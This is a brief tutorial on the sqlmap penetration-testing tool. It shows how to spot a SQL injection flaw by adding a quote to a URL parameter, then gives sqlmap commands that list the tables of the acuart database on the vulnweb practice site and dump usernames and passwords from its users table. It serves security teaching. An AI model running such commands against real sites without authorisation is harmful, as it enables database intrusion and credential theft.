SQLMAP

Image

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. 

https://github.com/sqlmapproject/sqlmap 

Installation

To install SQLmap we can pull it  from above github link or we can use below command 

  •  apt-get install sqlmap 

It comes installed by default in kali linux... 

To use sqlmap to exploit SQLi flaw 

       1. First we need to find a SQLi vulnerable parameter in a web app 

           testphp.vulnweb.com/listproducts.php?cat=2' 

           Addind a single quote showed this site parameter cat is vulnerable 

       2.  We can launch sqlmap to dump Databases, tables and cloumns and Data from the vulnerable site 

            Note: Using Sqlmap for exploitation without proper permission is illegal  

            -u url -p parameter  

            --dbs databases 

            --tables to get tables 

            --columns to get columns 

Sqlmap may take a lot of time as it will try lot of sqli techniques based on target SQL server (mysql, mssql, oracle etc.,) 

Once we got DB, we can fetch tables and columns 

  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 -p cat -D acuart --tables 

Lets dump user and pass info from users table 

  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 -p cat -D acuart -T users -C uname,pass --dump 

In this way SQLmap can be used to exploit blind SQLi vulnerability also.. 

Demo

Lock image